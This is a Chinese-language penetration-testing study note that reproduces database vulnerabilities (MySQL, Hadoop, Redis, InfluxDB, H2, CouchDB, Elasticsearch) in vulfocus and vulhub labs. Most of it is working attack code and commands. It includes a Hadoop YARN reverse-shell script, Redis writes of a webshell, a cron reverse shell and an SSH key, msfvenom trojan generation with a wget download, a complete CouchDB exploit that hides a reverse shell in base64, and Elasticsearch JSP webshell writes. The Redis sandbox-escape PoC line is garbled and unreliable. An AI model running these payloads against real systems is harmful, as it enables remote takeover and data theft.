数据库安全+漏洞复现

目录

MySQL未授权

CVE-2012-2122

Hadoop未授权访问

hadoop 命令执行

Redis未授权访问

CNVD_2015_07557

RCECVE-2022-0543

influxdb未授权访问

CVE-2019-20933

H2 database Console未授权访问

CouchDB-权限绕过配合RCE-漏洞

CVE-2017-12635

CVE-2017-12636

ElasticSearch文件写入&RCE-漏洞

WooYun-2015-110216

CVE-2014-3120

---

判断服务开放

1.端口扫描

端口扫描工具nmap.....

为什么有数据库，却扫描不到端口？
当数据库在内网的时候，我们的在外网是扫描不到的。有可能是防火墙或者其他的安全服务

2.组合猜测

当面对一个web服务时，我们大概能猜到有没有数据库

3.信息来源

通过渗透过程的一下信息泄露，或者报错判断

判断服务类型

1.数据库

2.文件传输

3.远程控制

4.数据通信

利用方式

1.特性漏洞

2.未授权访问

3.弱口令爆破

MySQL未授权

数据库对应的端口一般是3306

CVE-2012-2122

漏洞说明 当连接MariaDB/MySQL时，输入的密码会与期望的正确密码比较，由于不正确的处理，会导致即便是memcmp()返回一个非零值，也会使MySQL认为两个密码是相同的。也就是说只要知道用户名，不断尝试就能够直接登入SQL数据库漏洞

所有的Mariadb和mysql版本:5.1.61、5.0.11、5.3.5、5.5.22

具体看这位师傅的博客

Mysql 身份认证绕过漏洞（CVE-2012-2122）复现_mysql登录漏洞-CSDN博客

for i in `seq 1 1000`; do mysql -u root --password=bad -h 192.168.247.129 2>/dev/null; done

注意

数据库在弱口令爆破时

mysql默认配置本地登录root用户，远程连接请求是拒绝的，可以借助phpmyadmin操作

phpmyadmin是第三方数据库管理应用，搭建在对方服务器上的phpmyaadmin登录mysql数据库，数据库是从本地到本地的过程

Hadoop未授权访问

Hadoop有多个端口（类似组件/插件，比如50070/50075），但是是判断服务开启是看50010端口

使用在线靶场vulfocus，进行测试

vulfocus搭建过程

搭建机：centos

测试机：win10

先在centos上启动 docker

systemctl start docker

下载 Vulfocus 镜像

docker pull vulfocus/vulfocus:latest

开启靶场

docker run -d -p 80:80 -v /var/run/docker.sock:/var/run/docker.sock  -e VUL_IP=192.168.0.22 vulfocus/vulfocus
（1）-p  80:80 前端口代表物理机端口，后端口是docker端口
（2）-v /var/run/docker.sock:/var/run/docker.sock 为 docker 交互连接
（3）-e VUL_IP= Docker 服务器 IP

然后到win10上访问centos的ip，默认账密admin，admin

然后到镜像管理，搜索漏洞，然后下载就行

然后返回首页，启动下载的镜像即可

hadoop 命令执行

使用脚本

import requests
​
target = 'http://192.168.241.142:8088/'
lhost = '192.168.241.128' # put your local host ip here, and listen at port 9999
​
url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)

chat的解释
​
​
导入必要的模块:
​
python
Copy code
import requests
定义目标和本地主机:
​
python
Copy code
target = 'http://192.168.241.142:8088/'
lhost = '39.104.66.132'  # 将此处替换为攻击者的IP地址
target: YARN ResourceManager的URL，它是管理资源和调度应用程序的中央组件。
lhost: 反向shell将连接的攻击者的IP地址。
发送一个POST请求以创建一个新的YARN应用程序:
​
python
Copy code
url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
该脚本向YARN ResourceManager发送一个POST请求以创建一个新的应用程序，并从响应中获取生成的application-id。
构建和发送一个恶意的POST请求以提交应用程序:
​
python
Copy code
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)
该脚本构造了一个JSON载荷(data)，其中包含有关要提交的应用程序的详细信息。
am-container-spec部分包含一个命令，用于启动一个反向shell。它使用/bin/bash执行Bash shell，并将输入/输出重定向到指定的攻击者IP（lhost）和端口（9999）的TCP连接。
最后，脚本向YARN ResourceManager发送一个POST请求以提交恶意应用程序。

vps监听

nc -nvlp 9999

运行脚本即可

Redis未授权访问

Redis默认是没有密码，如果需要就要进行设置

写 Webshell 需得到 Web 路径
利用条件：Web 目录权限可读写
config set dir /tmp #设置 WEB 写入目录
config set dbfilename 1.php #设置写入文件名
set test "<?php phpinfo();?>" #设置写入文件代码
bgsave #保存执行
save #保存执行

CNVD_2015_07557

下载Redis客户端连接工具 大家可以自行在网上找来下载，下载完成后，直接解压，编译，编译后redis-cli默认生成在src目录，进入src目录，将redis-cli复制到 /usr/bin 目录即可以在终端的任意目录下执行。 下面的方法是在公网上下载的步骤，大家有需要可以在自己公网机器上搭建一个。（在自己虚拟机里面搭建也是差不多这样子的步骤）

apt install redis-tools
wget http://download.redis.io/releases/redis-6.0.3.tar.gz
tar -zxvf redis-6.0.3.tar.gz
cd redis-6.0
make
cd src 
cp redis-cli /usr/bin

3.连接测试是否可以连接成功，直接redis-cli -h ip -p port 当Ping 出现PONG的时候说明存在漏洞，连接成功

有时候会报错

redis-cli -h 192.168.178.143 -p 6379
Could not connect to Redis at 192.168.178.143:6379: No route to host
not connected> 

停止Linux的防火墙

$ systemctl stop firewalld.service

更改redis.conf

方式一，写入webshell
这个方法的前提条件是：1.知道网站根目录绝对路径。 2.对目标网站根目录有写入权限。
redis-cli -h 10.1.1.200 -p 6379                          //连接
config set dir /var/www/html                             //定义目录
config set dbfilename shell.php 
set x "<?php @eval($_POST['cmd']);?>" 
save

方式二，写定时任务
redis-cli -h 10.1.1.200 -p 6379 
config set dir /var/spool/cron
config set dbfilename root
set xxx "\n\n*/1 * * * * /bin/bash -i>& /dev/tcp/43.139.44.143/4433 0>&1\n\n"
save

写入linux ssh-key公钥
利用条件：
允许异地登录
Redis服务使用ROOT账户启动
安全模式下protect-mode处于关闭状态
允许使用密钥登录，即可远程写入一个公钥，直接登录远程服务器

ssh-keygen -t rsa
cd /root/.ssh/
(echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n") > key.txt
cat key.txt | redis-cli -h 118.31.57.214 -x set xxx
config set dir /root/.ssh/
config set dbfilename authorized_keys
save
cd /root/.ssh/
ssh -i id_rsa root@118.31.57.214

如果有了redis未授权访问权限，我们就有了在对方电脑上写文件的权利。 使用config set dir [path]命令来决定文件的写入路径。 使用config set dbfilename [filename]来决定文件名。 使用set key value，来确定文件的内容，key值任意即可，value即为文件内容。 使用save命令来确定以上所有操作并生成文件。

我们可以在写文件之前先用config get dir与config get dbfilename命令查询这两个字段的值并保存起来，等到我们写完文件后恢复这两个字段的值，增加我们攻击的隐蔽性。 必须在非保护模式下才有可能利用这个漏洞，如果在保护模式下即使访问了redis也是无法执行命令的

RCE自动化利用脚本-vulfocus 
https://github.com/vulhub/redis-rogue-getshell
python3 redis-master.py -r target-ip -p 6379 -L local-ip -P 8888 -f RedisModulesSDK/exp.so -c "id"
​
python redis-master.py -r 192.168.178.139 -p 11527 -L 192.168.178.135 -P 8888 -fRedisModulesSDK/exp.so -c "id'

RCECVE-2022-0543

5.新漏洞-沙箱绕过vulfocus
Poc:执行id命令，前提知道package.loadlib的位置
​
eval Tocal o_I= package.loadlib(usr/lib/x86 64-inux-gnu/liblua5.1.so.0""uaopen_io")local io = io_1(): local f = o.popen( id", "r"); local res = f:read(""a"): f:close(): return res' 0

具体看这位师傅的博客

CVE-2022-0543 Redis 沙盒逃逸分析 - FreeBuf网络安全行业门户

influxdb未授权访问

InfluxDB是什么呢 （1）InfluxDB是一个用于存储和分析时间序列数据的开源数据库。简单说，Influxdb就是一个时序数据库。 什么是时序数据库呢，简单说就是数据格式里包含Timestamp字段的数据，比如某一时间环境的温度，CPU的使用率等。 （2）InfluxDB里存储的数据被称为时间序列数据，其包含一个数值，就像CPU的load值或是温度值类似的。时序数据有零个或多个数据点，每一个都是一个指标值。数据点包括time(一个时间戳)，measurement(例如cpu_load)，至少一个k-v格式的field(也即指标的数值例如 “value=12.13”)，零个或多个tag （3）与Mysql相比 measurement类比于SQL里面的table，其主键索引总是时间戳。tag和field是在table里的其他列，tag是索引列，field是普通列

服务的端口号是8086

CVE-2019-20933

#Influxdb-未授权访问-Jw验证不当
默认端口: 8086 8088
influxdb是一款著名的时序数据库，其使用wt作为鉴权方式。在用户开启了认证，但未设孟参数shared-secret的情况下，jwt的认证密钥为空字符串，此时攻击者可以伪造任意用户身份在infiluxdb中执行SQL语句。

vps上搭建vulhub然后

cd /vulhub/influxdb/CVE-2019-20933 
docker-compose up -d

InfluxDB API默认有

/ping 用来检查 数据库实例状态和版本号 /query 用来查询数据库数据 /write 用来更改数据库数据

访问 vps-ip/query 会弹出登录框

抓包发现了

header里面放Authorization，就是为了验证用户身份，现在前后端分离，有跨域问题，session经常会失效 所以使用了token来验证用户身份

通过JSON Web Tokens - jwt.io生成Cookie，绕过身份验证，构造所需的 Token：

{
  "alg": "HS256",
  "typ": "JWT"
}
{
  "username": "admin",
  "exp": 1676346267
}

其中，username需要为已存在的用户，exp是时间戳，代表该 Token 的过期时间，所以需要生成一个未来的时间戳，其中1676346267转换为时间是：2023-02-14 11:44:27。 将secret的值置空，得到编码后的 Token

抓取/query页面的数据包，并将请求方式修改为 POST，添加请求头：

Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNzAzODU4MTIzfQ.dILO5ciwTYm7vZe-T9n9g7wIaWuiKbjxQ2lvKIW18Is

添加 POST 请求键值对：db=sample&q=show+users 如果直接这么发，他说我缺少必要参数 missing required parameter

需要加一下

Content-Type:application/x-www-form-urlencoded

主要是利用query和write来操作数据库的数据，先个基础语法：

SHOW USERS 查看当前所有的数据库用户 SHOW DATABASES 查看所有的数据库 SHOW MEASUREMENTS 查询当前数据库中含有的表 SHOW FIELD KEYS 查看当前数据库所有表的字段 CREATE USER LandGrey WITH PASSWORD ‘LandGrey’ 创建 LandGrey:LandGrey 数据库用户 其他查询语法和普通的SQL查询语法类似。 组合利用：

pretty=true 表示优化输出显示 参数 q 传入具体查询数据 参数 db 传入具体数据库名 参数 u 传入数据库用户名 参数 p 传入数据库密码

在/query页面发送 POST 请求：db=sample&q=show users，得到用户信息回显。

H2 database Console未授权访问

H2 database是一款Java内存数据库，多用于单元测试。H2 database自带一个Web管理页面，在Spimg开发中，如果我们设署如下选项，即可允许外部用户访问Web管理页面，且没有鉴权:默认端口: spring.h2.console.enabled=true spring.h2.console.settings.web-allow-others=true

访问http://your-ip:8080/h2-console/即可查看到H2 database的管理页面。
利用这个管理页面，我们可以进行JNDI注入攻击，进而在目标环境下执行任意命令

注意：如果在外网搭建的漏洞，就要用服务器运行上面的命令

3、填入URL提交执行 javax.naming.InitialContext

点击连接

返回vps上，发现它返回了数据

然后到/tmp目录下确实多了一个文件夹

以上的一个总体思路，个人理解就是在自己服务器上开启一个监听，让后通过H2 database的管理页面连接，然后我们的攻击命令是创建文件夹touch /tmp/success（在实战中，可以换成shell）

看了其他师傅的利用过程

首先使用msf生成一个Linux木马文件（LHOST和LPOST填写你VPS的IP和空闲端口）

msf5
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=6666 -f elf > shell.elf
​
msf6
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=x.x.x.x LPORT=6666 -f elf > shell.elf

利用python3搭建http服务器

python3 -m http.server 80

使用JDNI工具生成RMI利用链，执行的命令是下载后门文件

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "wget http://x.x.x.x/shell.elf" -A VPSip
javax.naming.InitialContext

点击连接，可以下载到了木马文件

给木马文件加执行权限（还是和上面同样的方式）

連接，可以看到靶场地址有加载rml url就说明执行了

启动msf,开启监听

msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost x.x.x.x
set lport 6666
run

最后执行木马文件（方法同上）

CouchDB-权限绕过配合RCE-漏洞

默认端口:5984 Apache CouchDB是一个开源数据库，专注于易用性和成为"完全拥抱web的数据库”。它是一个使用JSON作为存储格式，JavaScript作为查询语言，MapReduce和HTTP作为API的NOSQL数据库。应用广泛，如BBC用在其动态内容展示平台，Credit Suisse用在其内部的商品部门的市场框架，Meebo，用在其社交平台(web和应用程序)CouchDB权限绕过-CVE-2017-12635

CVE-2017-12635

影响版本：小于 1.7.0 以及 小于 2.1.1

http://ip:5984/_utils 跳转到登录页面，不过我们莫得账号密码。

先抓包，然改成以下

This is a normal request to add a user.

PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: your-ip:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 90
​
{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "password": "vulhub"
}

然后你会发现一个回显 {"error": "forbidden", "reason": "Only _admin may set roles"}, which means only administrator can use the endpoint.

PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: your-ip:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 108
​
{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "roles": [],
  "password": "vulhub"
}

Successfully created a user vulhub, with the password vulhub. 具体操作看vulhub/couchdb/CVE-2017-12635 at master · vulhub/vulhub · GitHub

然后访问/_utils登录新建用户账密

成功进入

CVE-2017-12636

需要先上个漏洞创建账户

官方给了python写的exp，可以直接反弹shell！ 修改其中的target和command为你的测试机器，然后修改version为对应的Couchdb版本（1或2），成功反弹shell

#!/usr/bin/env python3
import requests
import json
import base64
from requests.auth import HTTPBasicAuth
​
target = 'http://192.168.100.34:5984'
command = rb"""sh -i >& /dev/tcp/192.168.100.34/2333 0>&1"""
version = 1
​
session = requests.session()
session.headers = {
    'Content-Type': 'application/json'
}
# session.proxies = {
#     'http': 'http://127.0.0.1:8085'
# }
session.put(target + '/_users/org.couchdb.user:wooyun', data='''{
  "type": "user",
  "name": "wooyun",
  "roles": ["_admin"],
  "roles": [],
  "password": "wooyun"
}''')
​
session.auth = HTTPBasicAuth('wooyun', 'wooyun')
​
command = "bash -c '{echo,%s}|{base64,-d}|{bash,-i}'" % base64.b64encode(command).decode()
if version == 1:
    session.put(target + ('/_config/query_servers/cmd'), data=json.dumps(command))
else:
    host = session.get(target + '/_membership').json()['all_nodes'][0]
    session.put(target + '/_node/{}/_config/query_servers/cmd'.format(host), data=json.dumps(command))
​
session.put(target + '/wooyun')
session.put(target + '/wooyun/test', data='{"_id": "wooyuntest"}')
​
if version == 1:
    session.post(target + '/wooyun/_temp_view?limit=10', data='{"language":"cmd","map":""}')
else:
    session.put(target + '/wooyun/_design/test', data='{"_id":"_design/test","views":{"wooyun":{"map":""} },"language":"cmd"}')

运行前，先监听

nc -lvvp 2333

ElasticSearch文件写入&RCE-漏洞

默认端口:92009300 Elasticsearch 经常和 kibana配合出现在蓝队的使用，主要用作日志的处理和筛选

WooYun-2015-110216

漏洞描述 ElasticSearch具有备份数据的功能，用户可以传入一个路径，让其将数据备份到该路径下，且文件名和后缀都可控。

所以，如果同文件系统下还跑着其他服务，如Tomcat、PHP等，我们可以利用ElasticSearch的备份功能写入一个webshell。

和CVE-2015-5531类似，该漏洞和备份仓库有关。在elasticsearch1.5.1以后，其将备份仓库的根路径限制在配置文件的配置项path.repo中，而且如果管理员不配置该选项，则默认不能使用该功能。即使管理员配置了该选项，web路径如果不在该目录下，也无法写入webshell。所以该漏洞影响的ElasticSearch版本是1.5.x以前。

影响范围 1.5.x以前

原理

本测试环境同时运行了Tomcat和ElasticSearch，Tomcat目录在/usr/local/tomcat，web目录是/usr/local/tomcat/webapps；ElasticSearch目录在/usr/share/elasticsearch。

我们的目标就是利用ElasticSearch，在/usr/local/tomcat/webapps目录下写入我们的webshell。

测试过程

首先创建一个恶意索引文档：

curl -XPOST http://127.0.0.1:9200/yz.jsp/yz.jsp/1 -d'
{"<%new java.io.RandomAccessFile(application.getRealPath(new String(new byte[]{47,116,101,115,116,46,106,115,112})),new String(new byte[]{114,119})).write(request.getParameter(new String(new byte[]{102})).getBytes());%>":"test"}
'

这是一个使用cURL工具向Elasticsearch发送HTTP POST请求的命令。该请求的目标是将一条文档插入到Elasticsearch中，文档的索引为yz.jsp，类型为yz.jsp，文档ID为1。

具体来说，请求的主体（通过 -d 参数指定）是一个JSON格式的文档，包含一个字段和其对应的值。字段的名称是一个看似 JavaScript 代码的字符串，实际上，它是一段 Java 代码，用于执行文件写入操作。这段 Java 代码的作用是读取HTTP请求中名为f的参数的值，然后将该值写入到服务器上的一个特定文件中。

需要注意的是，这段代码是一个典型的 Java Web 攻击，利用了未经正确过滤的用户输入，通过写入恶意代码到服务器上的文件来实现攻击。这样的攻击可能导致服务器受到损害，甚至被入侵。因此，这种代码应该被谨慎对待，并且开发者应该采取适当的措施来防范此类攻击，例如对用户输入进行正确的验证和过滤。

再创建一个恶意的存储库，其中location的值即为我要写入的路径。

这个Repositories的路径比较有意思，因为他可以写到可以访问到的任意地方，并且如果这个路径不存在的话会自动创建。那也就是说你可以通过文件访问协议创建任意的文件夹。这里我把这个路径指向到了tomcat的web部署目录，因为只要在这个文件夹创建目录Tomcat就会自动创建一个新的应用(文件名为wwwroot的话创建出来的应用名称就是wwwroot了)。

curl -XPUT 'http://127.0.0.1:9200/_snapshot/yz.jsp' -d '{
     "type": "fs",
     "settings": {
          "location": "/usr/local/tomcat/webapps/wwwroot/",
          "compress": false
     }
}'

这是一个JSON格式的配置文件，用于配置Elasticsearch中的一个数据存储类型为"fs"（文件系统）的仓库。让我逐步解释其中的内容：

1. "type": "fs": 指定存储类型为文件系统（File System），即将Elasticsearch索引的数据保存在本地文件系统中。

2. "settings": 包含有关存储类型的设置的部分。

   • "location": "/usr/local/tomcat/webapps/wwwroot/": 指定了数据存储的位置，即数据将被保存在文件系统的/usr/local/tomcat/webapps/wwwroot/目录下。这是一个具体的路径，可能是Elasticsearch用于存储索引数据的目录。

   • "compress": false: 指定是否启用数据压缩。在这里，设置为false，表示不启用压缩，即索引数据将以原始形式存储。

这段配置表明，Elasticsearch将使用文件系统作为数据存储后端，并将索引数据保存在指定的目录中，同时选择不对数据进行压缩。这样的配置可能根据具体的部署需求和环境而有所不同

存储库验证并创建:

curl -XPUT "http://127.0.0.1:9200/_snapshot/yz.jsp/yz.jsp" -d '{
     "indices": "yz.jsp",
     "ignore_unavailable": "true",
     "include_global_state": false
}'

完成！

访问http://127.0.0.1:8080/wwwroot/indices/yz.jsp/snapshot-yz.jsp，这就是我们写入的webshell。

该shell的作用是向wwwroot下的test.jsp文件中写入任意字符串，如：http://127.0.0.1:8080/wwwroot/indices/yz.jsp/snapshot-yz.jsp?f=success

我们再访问/wwwroot/test.jsp就能看到success了：

CVE-2014-3120

原理

老版本ElasticSearch支持传入动态脚本（MVEL）来执行一些复杂的操作，而MVEL可执行Java代码，而且没有沙盒，所以我们可以直接执行任意代码。

代更新